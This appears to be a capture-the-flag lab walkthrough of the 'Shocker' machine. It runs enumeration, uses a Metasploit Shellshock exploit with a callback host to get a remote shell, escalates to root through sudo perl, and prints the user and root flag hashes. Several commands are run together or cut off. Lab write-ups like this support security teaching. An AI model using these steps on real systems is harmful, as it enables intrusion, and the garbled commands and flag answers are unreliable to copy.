As usual let's start with nmap:
nmap -sV -sC -p- 10.10.10.56
Port 80 is open so let's check the website:
Let's do a gobuster to check if we have any hidden directories:
gobuster dir - u http://10.10.10.56 -w /opy/useful/SecLists/Discovery/Web-Content/common.txt
We found a directory called /cgi-bin so let's do more gobuster on this directory:
gobuster dir -u 10.10.10.56/cgi-bin -w /opt/useful/SecLists/Discovery/Web-Content/big.txt -x php,html,txt,zip,cgi,sh,pl,py
We found 10.10.10.56/cgi-bin/user.sh
Let's check it out:
Let's save this file and check it out:
The name of the machine is Shocker, this reminds us of the Apache Shellshock.
Let's check if there is an exploit in Metasploit:
msfconsolesearch shellshock
Let's try exploit/multi/http/apache_mod_cgi_bash_env_exec
use exploit/multi/http/apache_mod_cgi_bash_env_exec
show options
set RHOSTS 10.10.10.56
set LHOST 10.10.14.3
set TARGETURI /cgi-bin/user.sh
exploit
Great! It worked!
getuid
sysinfo
shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
cd ..cd ..cd ..ls
cd homelscd shellyls
cat user.txt
2ec24e11320026d1e70ff3e16695b233
Congratulations! You got the user flag!
Privilege Escalation
Let's try the usual command for privilege escalation:
sudo -l
User shelly may run the following commands on Shocker:
/usr/bin/perl
Let's try to execute this command then:
sudo /usr/bin/perl -e 'exec "/bin/s
We get a shell!
whoami
Nice! We have successfully escalated our privileges to root!
Let's now upgrade our shell using:
python3 -c 'import pty;pty.spawn("/bin/bash")'
cd ..cd ..ls
cd rootlscat root.txt
52c2715605d70c7619030560dc1ca467
Congratulations! You got the root flag!